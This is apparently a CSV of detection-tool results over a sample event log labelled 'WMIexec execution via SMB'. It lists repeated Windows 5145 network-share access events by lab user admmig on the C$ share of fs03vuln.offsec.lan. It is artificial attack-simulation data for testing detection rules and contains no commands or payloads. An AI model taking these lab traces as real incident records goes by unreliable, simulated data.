2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Contacts\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Documents\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Downloads\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Favorites\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Links\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Music\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Pictures\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Saved Games\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Searches\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Videos\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napinit  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
